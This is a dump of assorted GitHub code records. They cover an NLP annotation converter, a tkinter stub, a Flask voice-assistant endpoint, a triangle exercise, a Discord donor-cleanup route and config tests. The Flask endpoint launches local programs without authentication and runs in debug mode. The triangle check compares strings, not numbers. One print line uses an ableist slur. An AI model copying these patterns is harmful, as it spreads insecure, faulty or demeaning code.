paragraphs)\n\n    Returns:\n        Tuple of output filenames if successful\n        None otherwise\n    \"\"\"\n\n    in_filename = arguments['<requirements.docx>']\n\n    if not os.path.isfile(in_filename):\n        qlog.error('The file \"{}\" does not exist'.format(in_filename))\n        return\n\n    # Integrity Check\n    if not cmd_check.check(arguments):\n        qlog.error('Aborted due to document check failures.')\n        return\n\n    # Load\n    lprint('Loading document...')\n    doc = WordDocx(qlog, os.path.abspath(in_filename))\n\n    # Identify clusters\n    lprint('Identifying paragraph clusters...')\n    clusters = doc.get_clusters()\n\n    # Parse\n    lprint('Parsing clusters...')\n    directives_found = 0\n    directives_styled = 0\n    for cluster in clusters:\n        if cluster['cluster_type'] == 'directive':\n            directives_found += 1\n            directive_dict = cluster['directive']\n            directive_type = get_directive_type(directive_dict)\n            qlog.debug(\"Processing directive: {}\".format(directive_dict))\n            if directive_type == '#shortform':\n                target_style = doc._document.styles['Cascade Directive']\n            else:\n                target_style = doc._document.styles['Cascade Hidden Directive']\n            touched = False\n            for paragraph in cluster['paragraphs']:\n                if paragraph.style != target_style:\n                    touched = True\n                    paragraph.style = target_style\n            if touched:\n                directives_styled += 1\n\n    lprint('{} directives were found.'.format(directives_found))\n    lprint('{} directives were re-styled.'.format(directives_styled))\n\n    #----------------------------\n    # Save\n    #----------------------------\n    out_file_info = make_output_file_info(\n        in_filename,\n        arguments['<output.docx>'],\n        '_STYLED'\n    )\n\n    lprint('Saving \"{}\"...'.format(out_file_info['path_and_filename']))\n    doc.save(out_file_info['path_and_filename'])\n\n    return (out_file_info['filename'],)\n","repo_name":"epmoyer/cascade","sub_path":"web/cascade/cmd_apply_styles.py","file_name":"cmd_apply_styles.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36149743184","text":"# coding=utf-8\n\"\"\"\ncopy from paddlenlp\n\"\"\"\nimport time\nimport logging\nfrom pathlib import Path\nimport math\nimport os\nimport random\n\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef setLogger(use_ch: bool = False):\n    logger = logging.getLogger()\n    logger.setLevel(logging.DEBUG)  # 
Log等级总开关\n # 第二步,创建一个handler,用于写入日志文件\n rq = time.strftime('%Y-%m-%d', time.localtime(time.time()))\n log_path = Path.cwd() / 'Logs'\n log_name = log_path / (rq + '.log')\n logfile = log_name\n log_path.mkdir(parents=True, exist_ok=True)\n\n fh = logging.FileHandler(logfile, mode='a', encoding='utf-8')\n fh.setLevel(logging.DEBUG) # 输出到file的log等级的开关\n\n # 第三步,定义handler的输出格式\n formatter = logging.Formatter(\"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s\")\n fh.setFormatter(formatter)\n\n # 第四步,将filehandler添加到logger里面\n logger.addHandler(fh)\n\n # console handler\n if use_ch:\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n return logger\n\n\nlogger = setLogger()\n\n\nclass DataConverter(object):\n \"\"\"DataConverter to convert data export from annotation platform\"\"\"\n\n def __init__(\n self,\n label_studio_file,\n negative_ratio=5,\n prompt_prefix=\"情感倾向\",\n options=[\"正向\", \"负向\"],\n separator=\"##\",\n layout_analysis=False,\n expand_to_a4_size=True,\n schema_lang=\"ch\",\n ocr_lang=\"en\",\n anno_type=\"text\",\n ):\n \"\"\"Init Data Converter\"\"\"\n self.negative_ratio = negative_ratio\n self.prompt_prefix = prompt_prefix\n self.options = options\n self.separator = separator\n self.layout_analysis = layout_analysis\n self.expand_to_a4_size = expand_to_a4_size\n self.schema_lang = schema_lang\n self.ocr_lang = ocr_lang\n self.anno_type = anno_type\n self.label_studio_file = label_studio_file\n self.ignore_list = [\"属性值\", \"object\"]\n\n def process_text_tag(self, line, task_type=\"ext\"):\n items = {}\n items[\"text\"] = line[\"data\"][\"text\"]\n if task_type == \"ext\":\n items[\"entities\"] = []\n items[\"relations\"] = []\n result_list = line[\"annotations\"][0][\"result\"]\n for a in result_list:\n if a[\"type\"] == \"labels\":\n items[\"entities\"].append(\n {\n \"id\": a[\"id\"],\n \"start_offset\": a[\"value\"][\"start\"],\n \"end_offset\": a[\"value\"][\"end\"],\n \"label\": a[\"value\"][\"labels\"][0],\n }\n )\n else:\n items[\"relations\"].append(\n {\n \"id\": a[\"from_id\"] + \"-\" + a[\"to_id\"],\n \"from_id\": a[\"from_id\"],\n \"to_id\": a[\"to_id\"],\n \"type\": a[\"labels\"][0],\n }\n )\n elif task_type == \"cls\":\n items[\"label\"] = line[\"annotations\"][0][\"result\"][0][\"value\"][\"choices\"]\n return items\n\n def convert_cls_examples(self, raw_examples):\n \"\"\"\n Convert labeled data for classification task.\n \"\"\"\n examples = []\n logger.info(\"Converting annotation data...\")\n with tqdm(total=len(raw_examples)):\n for line in raw_examples:\n if self.anno_type == \"text\":\n items = self.process_text_tag(line, task_type=\"cls\")\n else:\n raise ValueError(\"The type of annotation should be text or image\")\n text, labels = items[\"text\"], items[\"label\"]\n example = self.generate_cls_example(text, labels, self.prompt_prefix, self.options)\n examples.append(example)\n return examples\n\n def convert_ext_examples(self, raw_examples, is_train=True):\n \"\"\"\n Convert labeled data for extraction task.\n \"\"\"\n\n def _sep_cls_label(label, separator):\n label_list = label.split(separator)\n if len(label_list) == 1:\n return label_list[0], None\n return label_list[0], label_list[1:]\n\n texts = []\n # {\"content\": \"\", \"result_list\": [], \"prompt\": \"X\"}\n entity_examples = []\n # {\"content\": \"\", \"result_list\": [], \"prompt\": \"X的Y\"}\n relation_examples = []\n # {\"content\": \"\", \"result_list\": [], \"prompt\": \"X的情感倾向[正向,负向]\"}\n entity_cls_examples = []\n\n # 
Entity label set: [\"时间\", \"地点\", ... ]\n entity_label_set = []\n # Entity name set: [\"2月8日上午\", \"北京\", ... ]\n entity_name_set = []\n # Predicate set: [\"歌手\", \"所属专辑\", ... ]\n predicate_set = []\n\n # List[List[str]]\n # List of entity prompt for each example\n entity_prompt_list = []\n # List of relation prompt for each example\n relation_prompt_list = []\n # Golden subject label for each example\n subject_golden_list = []\n # List of inverse relation for each example\n inverse_relation_list = []\n # List of predicate for each example\n predicate_list = []\n\n logger.info(\"Converting annotation data...\")\n with tqdm(total=len(raw_examples)) as pbar:\n for line in raw_examples:\n\n if self.anno_type == \"text\":\n items = self.process_text_tag(line, task_type=\"ext\")\n else:\n raise ValueError(\"The type of annotation should be text or image\")\n # print(items)\n # exit()\n text, relations, entities = items[\"text\"], items[\"relations\"], items[\"entities\"]\n texts.append(text)\n\n entity_example = []\n entity_prompt = []\n entity_example_map = {}\n entity_map = {} # id to entity name\n for entity in entities:\n entity_name = text[entity[\"start_offset\"] : entity[\"end_offset\"]]\n entity_map[entity[\"id\"]] = {\n \"name\": entity_name,\n \"start\": entity[\"start_offset\"],\n \"end\": entity[\"end_offset\"],\n }\n if entity[\"label\"] in self.ignore_list:\n continue\n\n entity_label, entity_cls_label = _sep_cls_label(entity[\"label\"], self.separator)\n\n # Define the prompt prefix for entity-level classification\n # xxx + \"的\" + 情感倾向 -> Chinese\n # Sentiment classification + \" of \" + xxx -> English\n if self.schema_lang == \"ch\":\n entity_cls_prompt_prefix = entity_name + \"的\" + self.prompt_prefix\n else:\n entity_cls_prompt_prefix = self.prompt_prefix + \" of \" + entity_name\n if entity_cls_label is not None:\n entity_cls_example = self.generate_cls_example(\n text, entity_cls_label, entity_cls_prompt_prefix, self.options)\n\n entity_cls_examples.append(entity_cls_example)\n\n result = {\"text\": entity_name, \"start\": entity[\"start_offset\"], \"end\": entity[\"end_offset\"]}\n if entity_label not in entity_example_map.keys():\n entity_example_map[entity_label] = {\n \"content\": text,\n \"result_list\": [result],\n \"prompt\": entity_label,\n }\n else:\n entity_example_map[entity_label][\"result_list\"].append(result)\n\n if entity_label not in entity_label_set and entity_label != \"观点词\":\n entity_label_set.append(entity_label)\n if entity_name not in entity_name_set:\n entity_name_set.append(entity_name)\n entity_prompt.append(entity_label)\n\n for v in entity_example_map.values():\n entity_example.append(v)\n\n entity_examples.append(entity_example)\n entity_prompt_list.append(entity_prompt)\n\n subject_golden = [] # Golden entity inputs\n relation_example = []\n relation_prompt = []\n relation_example_map = {}\n inverse_relation = []\n predicates = []\n for relation in relations:\n predicate = relation[\"type\"]\n subject_id = relation[\"from_id\"]\n object_id = relation[\"to_id\"]\n # The relation prompt is constructed as follows:\n # subject + \"的\" + predicate -> Chinese\n # predicate + \" of \" + subject -> English\n if self.schema_lang == \"ch\":\n prompt = entity_map[subject_id][\"name\"] + \"的\" + predicate\n inverse_negative = entity_map[object_id][\"name\"] + \"的\" + predicate\n else:\n prompt = predicate + \" of \" + entity_map[subject_id][\"name\"]\n inverse_negative = predicate + \" of \" + entity_map[object_id][\"name\"]\n\n if 
entity_map[subject_id][\"name\"] not in subject_golden:\n subject_golden.append(entity_map[subject_id][\"name\"])\n result = {\n \"text\": entity_map[object_id][\"name\"],\n \"start\": entity_map[object_id][\"start\"],\n \"end\": entity_map[object_id][\"end\"],\n }\n\n inverse_relation.append(inverse_negative)\n predicates.append(predicate)\n\n if prompt not in relation_example_map.keys():\n relation_example_map[prompt] = {\"content\": text, \"result_list\": [result], \"prompt\": prompt}\n else:\n relation_example_map[prompt][\"result_list\"].append(result)\n\n if predicate not in predicate_set:\n predicate_set.append(predicate)\n relation_prompt.append(prompt)\n\n for v in relation_example_map.values():\n relation_example.append(v)\n\n relation_examples.append(relation_example)\n relation_prompt_list.append(relation_prompt)\n subject_golden_list.append(subject_golden)\n inverse_relation_list.append(inverse_relation)\n predicate_list.append(predicates)\n pbar.update(1)\n\n logger.info(\"Adding negative samples for first stage prompt...\")\n positive_examples, negative_examples = self.add_entity_negative_example(\n entity_examples, texts, entity_prompt_list, entity_label_set\n )\n if len(positive_examples) == 0:\n all_entity_examples = []\n else:\n all_entity_examples = positive_examples + negative_examples\n\n all_relation_examples = []\n if len(predicate_set) != 0:\n logger.info(\"Adding negative samples for second stage prompt...\")\n if is_train:\n\n positive_examples = []\n negative_examples = []\n per_n_ratio = self.negative_ratio // 3\n\n with tqdm(total=len(texts)) as pbar:\n for i, text in enumerate(texts):\n negative_example = []\n collects = []\n num_positive = len(relation_examples[i])\n\n # 1. inverse_relation_list\n redundants1 = inverse_relation_list[i]\n\n # 2. entity_name_set ^ subject_golden_list[i]\n redundants2 = []\n if len(predicate_list[i]) != 0:\n nonentity_list = list(set(entity_name_set) ^ set(subject_golden_list[i]))\n nonentity_list.sort()\n\n if self.schema_lang == \"ch\":\n redundants2 = [\n nonentity + \"的\" + predicate_list[i][random.randrange(len(predicate_list[i]))]\n for nonentity in nonentity_list\n ]\n else:\n redundants2 = [\n predicate_list[i][random.randrange(len(predicate_list[i]))] + \" of \" + nonentity\n for nonentity in nonentity_list\n ]\n\n # 3. 
entity_label_set ^ entity_prompt_list[i]\n redundants3 = []\n if len(subject_golden_list[i]) != 0:\n non_ent_label_list = list(set(entity_label_set) ^ set(entity_prompt_list[i]))\n non_ent_label_list.sort()\n\n if self.schema_lang == \"ch\":\n redundants3 = [\n subject_golden_list[i][random.randrange(len(subject_golden_list[i]))]\n + \"的\"\n + non_ent_label\n for non_ent_label in non_ent_label_list\n ]\n else:\n redundants3 = [\n non_ent_label\n + \" of \"\n + subject_golden_list[i][random.randrange(len(subject_golden_list[i]))]\n for non_ent_label in non_ent_label_list\n ]\n\n redundants_list = [redundants1, redundants2, redundants3]\n\n for redundants in redundants_list:\n if self.anno_type == \"text\":\n added, rest = self.add_relation_negative_example(\n redundants,\n texts[i],\n num_positive,\n per_n_ratio,\n )\n negative_example.extend(added)\n collects.extend(rest)\n\n num_sup = num_positive * self.negative_ratio - len(negative_example)\n if num_sup > 0 and collects:\n if num_sup > len(collects):\n idxs = [k for k in range(len(collects))]\n else:\n idxs = random.sample(range(0, len(collects)), num_sup)\n for idx in idxs:\n negative_example.append(collects[idx])\n\n positive_examples.extend(relation_examples[i])\n negative_examples.extend(negative_example)\n pbar.update(1)\n all_relation_examples = positive_examples + negative_examples\n else:\n relation_examples = self.add_full_negative_example(\n relation_examples, texts, relation_prompt_list, predicate_set, subject_golden_list\n )\n all_relation_examples = [r for relation_example in relation_examples for r in relation_example]\n return all_entity_examples + all_relation_examples + entity_cls_examples\n\n def generate_cls_example(self, text, labels, prompt_prefix, options):\n random.shuffle(self.options)\n cls_options = \",\".join(self.options)\n prompt = prompt_prefix + \"[\" + cls_options + \"]\"\n\n result_list = []\n example = {\"content\": text, \"result_list\": result_list, \"prompt\": prompt}\n for label in labels:\n start = prompt.rfind(label) - len(prompt) - 1\n end = start + len(label)\n result = {\"text\": label, \"start\": start, \"end\": end}\n example[\"result_list\"].append(result)\n return example\n\n def add_full_negative_example(\n self, examples, texts, relation_prompt_list, predicate_set, subject_golden_list):\n with tqdm(total=len(relation_prompt_list)) as pbar:\n for i, relation_prompt in enumerate(relation_prompt_list):\n negative_sample = []\n for subject in subject_golden_list[i]:\n for predicate in predicate_set:\n # The relation prompt is constructed as follows:\n # subject + \"的\" + predicate -> Chinese\n # predicate + \" of \" + subject -> English\n if self.schema_lang == \"ch\":\n prompt = subject + \"的\" + predicate\n else:\n prompt = predicate + \" of \" + subject\n if prompt not in relation_prompt:\n negative_result = {\"content\": texts[i], \"result_list\": [], \"prompt\": prompt}\n negative_sample.append(negative_result)\n examples[i].extend(negative_sample)\n pbar.update(1)\n return examples\n\n def add_entity_negative_example(self, examples, texts, prompts, label_set):\n negative_examples = []\n positive_examples = []\n with tqdm(total=len(prompts)) as pbar:\n for i, prompt in enumerate(prompts):\n redundants = list(set(label_set) ^ set(prompt))\n redundants.sort()\n\n num_positive = len(examples[i])\n if num_positive != 0:\n actual_ratio = math.ceil(len(redundants) / num_positive)\n else:\n # Set num_positive to 1 for text without positive example\n num_positive, actual_ratio = 1, 0\n\n if 
actual_ratio <= self.negative_ratio or self.negative_ratio == -1:\n idxs = [k for k in range(len(redundants))]\n else:\n idxs = random.sample(range(0, len(redundants)), self.negative_ratio * num_positive)\n\n for idx in idxs:\n negative_result = {\"content\": texts[i], \"result_list\": [], \"prompt\": redundants[idx]}\n negative_examples.append(negative_result)\n positive_examples.extend(examples[i])\n pbar.update(1)\n return positive_examples, negative_examples\n\n def add_relation_negative_example(self, redundants, text, num_positive, ratio):\n added_example = []\n rest_example = []\n\n if num_positive != 0:\n actual_ratio = math.ceil(len(redundants) / num_positive)\n else:\n # Set num_positive to 1 for text without positive example\n num_positive, actual_ratio = 1, 0\n\n all_idxs = [k for k in range(len(redundants))]\n if actual_ratio <= ratio or ratio == -1:\n idxs = all_idxs\n rest_idxs = []\n else:\n idxs = random.sample(range(0, len(redundants)), ratio * num_positive)\n rest_idxs = list(set(all_idxs) ^ set(idxs))\n\n for idx in idxs:\n negative_result = {\"content\": text, \"result_list\": [], \"prompt\": redundants[idx]}\n added_example.append(negative_result)\n\n for rest_idx in rest_idxs:\n negative_result = {\"content\": text, \"result_list\": [], \"prompt\": redundants[rest_idx]}\n rest_example.append(negative_result)\n\n return added_example, rest_example","repo_name":"rongruosong/uie-lightning","sub_path":"dataconvert.py","file_name":"dataconvert.py","file_ext":"py","file_size_in_byte":20049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13584347318","text":"import sys\n#holy shit lol\n#from mapprocessor import listofdata\nfrom tkinter import *\nselection = \"\"\n\nclass mapwindow:\n def __init__(self, master):\n self.master = master\n\n root.geometry('{}x{}'.format(500, 500))\n\n master.title(\"well i guess we're gonna use tinker\")\n\n #self.label = Label(master, text=\"This is our first GUI!\")\n #self.label.pack()\n\n #self.greet_button = Button(master, text=\"Greet\", command=self.greet)\n #self.greet_button.pack()\n\n school = StringVar(master)\n school.set(\"one\") # default value\n\n\n w = OptionMenu(master, school, \"one\", \"two\", \"three\")\n w.pack()\n\n\n self.what = Button(master, text=\"submit\", command=self.givemethetype)\n self.what.pack()\n\n self.close_button = Button(master, text=\"Close\", command=master.quit)\n self.close_button.pack()\n\n\n def greet(self):\n print(\"Greetings!\")\n\n def schools(self):\n print(\"die\")#empty lines here\n\n def givemethetype(self):\n print(\"am i retarded\")\n\n\nroot = Tk()\nmy_gui = mapwindow(root)\nroot.mainloop()\n","repo_name":"itsmerachel/hackit","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8033134116","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS\nimport subprocess\nfrom root import search_google, open_software, open_website\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/process_command', methods=['POST'])\ndef process_command():\n data = request.json\n command = data.get('command')\n\n if \"open my certificate\" in command:\n filename1 = r\"C:\\Users\\kalba\\Pictures\\Screenshots\\Harvard certificate.png\"\n subprocess.Popen([filename1], shell=True)\n response = \"Opening certificate...\"\n elif \"open browser\" in command:\n open_website(\"http://www.google.com\")\n 
response = \"Opening browser...\"\n elif \"search\" in command:\n search_query = command.replace(\"search\", \"\").strip()\n search_google(search_query)\n response = \"Searching...\"\n elif \"open software\" in command:\n software_name = command.replace(\"open software\", \"\").strip()\n open_software(software_name)\n response = \"Opening software...\"\n else:\n response = \"Command not recognized.\"\n\n return jsonify({'response': response})\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"NeviLInit/PersonalVoiceAssistant","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"148776562","text":"# 给你三个整数a,b,c, 判断能否以它们为三个边长构成三角形。\n# 若能,输出YES,否则输出NO。\n#此处使用三角形的定律,三角形的两条边长的和大于第三条边\nL=[]\n\nfor i in range(3):\n a = input(\"请输入三角形的边\")\n L.append(a)\nL=sorted(L)\nif (L[0]+L[1]>L[2]):\n print(\"YES\")\nelse:\n print(\"NO\")","repo_name":"microease/Python-Tip-Note","sub_path":"029ok.py","file_name":"029ok.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11177822201","text":"import pandas as pd\nimport joblib\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\ndef load_objects():\n model = joblib.load('model.pkl')\n imputer = joblib.load('impute.pkl')\n encode = joblib.load('encode.pkl')\n scale = joblib.load('scale.pkl')\n return model, imputer, encode, scale\n\n\ndef preprocess(data,impute, encode, scale):\n new_ = pd.DataFrame(data).T\n new_.columns = ['name','fuel_type', 'km_driven']\n new_['km_driven'] = impute.transform(new_[['km_driven']])\n res_encode_cat = encode.transform(new_[['name','fuel_type']])\n new_['km_driven'] = scale.transform(new_[['km_driven']])\n cat_out = pd.DataFrame(res_encode_cat, columns=encode.get_feature_names_out())\n final_preprocessed = pd.concat([cat_out,new_['km_driven']],axis =1)\n return final_preprocessed\n\n\nclass CustomTransformer(BaseEstimator, TransformerMixin):\n def __init__(self):\n print('\\n>>>>>>>init() called.\\n')\n def fit(self, X, y = None):\n print('\\n>>>>>>>fit() called.\\n')\n return self\n def transform(self, X, y = None):\n print('\\n>>>>>>>transform() called.\\n')\n print(\"\\n>>>> Input : \",X)\n X_ = X.applymap(lambda x: x.lower())\n print(\"\\n>>>> Output : \",X_)\n print(\"\\n>>>>>>> Custom Transformer Called\")\n return X_","repo_name":"nursnaaz/DataScienceMasterclass","sub_path":"09 - Variance-Bias-Pipeline/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"40893593077","text":"import sys\nsys.stdin = open('input.txt')\n\n\nA, B = map(int, input().split())\n\n\ndef solution(A, B):\n cnt = 1\n\n while 1:\n if A > B:\n return -1\n\n if B % 2 == 0:\n B //= 2\n cnt += 1\n\n else:\n tmp = str(B)\n B = int(tmp[:-1])\n cnt += 1\n\n if B == A:\n return cnt\n\nprint(solution(A, B))","repo_name":"hksoftcorn/boj","sub_path":"백준특강/16953_atob(x)/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29051656253","text":"import bottle\nimport time\nimport json\n\nfrom objects import glob\nfrom constants import exceptions\nfrom helpers import coro\n\n@bottle.route(\"/api/v1/clear_donor\", method=\"POST\")\ndef 
clear_donor_post():\n\tdata = {\n\t\t\"status\": 200,\n\t\t\"message\": \"ok\"\n\t}\n\ttry:\n\t\t# Get discord expired donors\n\t\texpired = glob.db.fetch_all(\"SELECT discord_roles.discordid, discord_roles.roleid, users.id FROM discord_roles RIGHT JOIN users ON users.id = discord_roles.userid WHERE users.privileges & 4 > 0 AND donor_expire <= %s\", [int(time.time())])\n\n\t\t# Do all the work if the query has returned something\n\t\tif expired is not None:\n\t\t\t# Get discord server object and make sure it's valid\n\t\t\tdiscord_server = glob.client.get_server(glob.config.config[\"discord\"][\"server_id\"])\n\t\t\tif discord_server is None:\n\t\t\t\traise exceptions.NotInServerError()\n\n\t\t\t# Get donators role object\n\t\t\tdonor_role = None\n\t\t\tfor i in discord_server.roles:\n\t\t\t\tif i.name.lower() == \"donators\":\n\t\t\t\t\tdonor_role = i\n\n\t\t\t# Make sure the donorRole is valid\n\t\t\tif donor_role is None:\n\t\t\t\tcoro.sync_coroutine(glob.client.send_message(discord_server.get_default_channel(), \"Error while cleaning expired donors! Looks like the donators role is gone! Nyo-sama where are you? :'(\"))\n\t\t\t\traise exceptions.NoRoleError()\n\n\t\t\t# Remove donators and custom roles to expired donors\n\t\t\tfor i in expired:\n\t\t\t\tprint(\"Removing donor for user {}\".format(i[\"id\"]))\n\n\t\t\t\t# First, remove donor badge\n\t\t\t\tglob.db.execute(\"DELETE FROM user_badges WHERE user = %s AND badge = '14' LIMIT 1\", [i[\"id\"]])\n\n\t\t\t\t# Then, do discord stuff\n\t\t\t\t# Make sure the discord id is valid\n\t\t\t\tif i[\"discordid\"] is None or i[\"discordid\"] == 0:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Get the user and make sure he is still inside the server\t\n\t\t\t\tdiscord_user = discord_server.get_member(str(i[\"discordid\"]))\n\t\t\t\tif discord_user is None:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Remove donators role\n\t\t\t\tcoro.sync_coroutine(glob.client.remove_roles(discord_user, donor_role))\n\n\t\t\t\t# Unlink discord and ripple accounts\n\t\t\t\tglob.db.execute(\"DELETE FROM discord_roles WHERE discordid = %s LIMIT 1\", [i[\"discordid\"]])\n\n\t\t\t\t# Delete profile background\n\t\t\t\tglob.db.execute(\"DELETE FROM profile_backgrounds WHERE uid = %s LIMIT 1\", [i[\"id\"]])\n\n\t\t\t\t# Get the custom role\n\t\t\t\tcustom_role = None\n\t\t\t\tfor j in discord_server.roles:\n\t\t\t\t\tif j.id == str(i[\"roleid\"]):\n\t\t\t\t\t\tcustom_role = j\n\n\t\t\t\t# Make sure the custom role is valid\n\t\t\t\tif custom_role is None:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Delete custom role from server\n\t\t\t\tcoro.sync_coroutine(glob.client.delete_role(discord_server, custom_role))\n\n\t\t# Remove website and ingame expired donor privilege\n\t\tglob.db.execute(\"UPDATE users SET privileges = privileges & ~4 WHERE privileges & 4 > 0 AND donor_expire <= %s\", [int(time.time())])\n\texcept exceptions.InvalidSecretKeyError:\n\t\tdata[\"status\"] = 403\n\t\tdata[\"message\"] = \"Bot not in server\"\n\texcept exceptions.NoRoleError:\n\t\tdata[\"status\"] = 500\n\t\tdata[\"message\"] = \"Donators role not found\"\n\texcept:\n\t\tdata[\"status\"] = 500\n\t\tdata[\"message\"] = \"Unhandled exception\"\n\t\traise\n\tfinally:\n\t\tjson_data = json.dumps(data)\n\t\tyield json_data","repo_name":"osuripple/DonorBot","sub_path":"web/clear_donor.py","file_name":"clear_donor.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36020437662","text":"import os\nimport sys\nimport 
unittest\nfrom argparse import ArgumentParser\nfrom copy import deepcopy\nfrom types import SimpleNamespace\nfrom typing import Dict, Optional, Union\n\nimport torchvision.models as torchmodels\nimport yaml\n\nimport automated_retraining.distribution_shifts as distribution_shifts\nimport automated_retraining.models as models\nimport automated_retraining.models.architectures as architectures\nimport automated_retraining.query_strategies as strategies\nimport automated_retraining.state_estimation as state_estimators\nfrom automated_retraining.tests.utils import validate_schema\nimport automated_retraining.model_calibration as model_calibration\n\n\nclass ConfigTester(unittest.TestCase):\n def test_config(self) -> None:\n self.assertTrue(\n test_params.config\n in [\n \"training\",\n \"active_learning_distributed\",\n \"active_learning_standalone\",\n ],\n 'Expected \"training\", \"active_learning_standalone\", or \"active_learning_distributed\"',\n )\n\n\nclass ModelConfigTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_model_name(self) -> None:\n if not hasattr(test_params, \"model_name\"):\n return\n\n config = test_args[\"config\"]\n if config == \"training\":\n self.assertTrue(\n test_params.model_name != \"ActiveModel\", \"Did not expect ActiveModel\"\n )\n elif config == \"active_learning\":\n self.assertTrue(\n test_params.model_name in [\"ActiveModel\"], \"Expected ActiveModel\"\n )\n else:\n pass\n self.assertTrue(\n hasattr(models, test_params.model_name),\n \"model_name not defined in models folder\",\n )\n\n def test_architecture_name(self) -> None:\n if not hasattr(test_params, \"architecture\"):\n return\n self.assertTrue(\n hasattr(architectures, test_params.architecture)\n or hasattr(torchmodels, test_params.architecture),\n \"architectue not in utils/architectures folder\",\n )\n\n def test_calibration_name(self) -> None:\n if not hasattr(test_params, \"calibration\"):\n return\n self.assertTrue(\n hasattr(model_calibration, test_params.calibration),\n \"unknown calibration method\",\n )\n\n\nclass TrainingParamsTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_batch_size(self) -> None:\n if not hasattr(test_params, \"batch_size\"):\n return\n self.assertTrue(0 < test_params.batch_size, \"Expected batch_size > 0\")\n\n def test_weight_decay(self) -> None:\n if not hasattr(test_params, \"weight_decay\"):\n return\n self.assertTrue(0 < test_params.weight_decay, \"Expected weight_decay > 0\")\n\n def test_learning_rate(self) -> None:\n if not hasattr(test_params, \"lr\"):\n return\n self.assertTrue(0 < test_params.lr, \"Expected lr > 0\")\n\n def test_gamma(self) -> None:\n if not hasattr(test_params, \"gamma\"):\n return\n self.assertTrue(0 < test_params.gamma, \"Expected gamma > 0\")\n\n def test_momentum(self) -> None:\n if not hasattr(test_params, \"momentum\"):\n return\n self.assertTrue(0 <= test_params.momentum, \"Expected momentum > 0\")\n\n\nclass TrainingConfigTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_with_validation(self) -> None:\n if not hasattr(test_params, \"with_validation\"):\n return\n config 
= test_args[\"config\"]\n if config == \"active_learning\":\n self.assertTrue(\n test_params.with_validation == False,\n \"Expected with_validation to be false when active learning\",\n )\n\n def test_results_dir(self) -> None:\n if not hasattr(test_params, \"results_dir\"):\n return\n path = test_params.results_dir\n self.assertTrue(\n os.path.isdir(path),\n f\"Path {path} does not exist. Please specify full path\",\n )\n\n def test_experiment(self) -> None:\n pass\n\n def test_max_epochs(self) -> None:\n if not hasattr(test_params, \"max_epochs\"):\n return\n self.assertTrue(0 < test_params.max_epochs, \"Expected max_epochs > 0\")\n\n def test_device(self) -> None:\n if not hasattr(test_params, \"device\"):\n return\n self.assertTrue(\n test_params.device in [\"cuda\", \"cpu\"], 'Expected \"cpu\" or \"cuda\"'\n )\n\n def test_logger(self) -> None:\n if not hasattr(test_params, \"logger\"):\n return\n self.assertTrue(\n test_params.logger in [\"tensorboard\", \"csvfile\"],\n 'Expected \"tensorboard\" or \"csvfile\"',\n )\n\n\nclass DatasetConfigTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_datamodule(self) -> None:\n pass\n\n def test_dataset_dir(self) -> None:\n if not hasattr(test_params, \"dataset_dir\"):\n return\n self.assertTrue(\n os.path.isdir(test_params.dataset_dir),\n f\"Path {test_params.dataset_dir} does not exits. Please specify full path.\",\n )\n\n def test_n_samples(self) -> None:\n pass\n\n\nclass ActiveParamsTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_n_query(self) -> None:\n if not hasattr(test_params, \"n_query\"):\n return\n self.assertTrue(0 < test_params.n_query, \"Expected n_query > 0\")\n\n def test_n_iter(self) -> None:\n if not hasattr(test_params, \"n_iter\"):\n return\n\n def test_strategy(self) -> None:\n if not hasattr(test_params, \"strategy\"):\n return\n self.assertTrue(\n hasattr(strategies, test_params.strategy),\n \"strategy not in query_strategies\",\n )\n\n def test_state_estimator(self) -> None:\n if not hasattr(test_params, \"state_estimation_method\"):\n return\n self.assertTrue(\n hasattr(state_estimators, test_params.state_estimation_method),\n \"state estimation method not in state_estimation\",\n )\n\n def test_host(self) -> None:\n if not hasattr(test_params, \"state_estimation_host\"):\n return\n self.assertTrue(test_params.state_estimation_host in [\"edge\", \"datacenter\"])\n state_estimator = 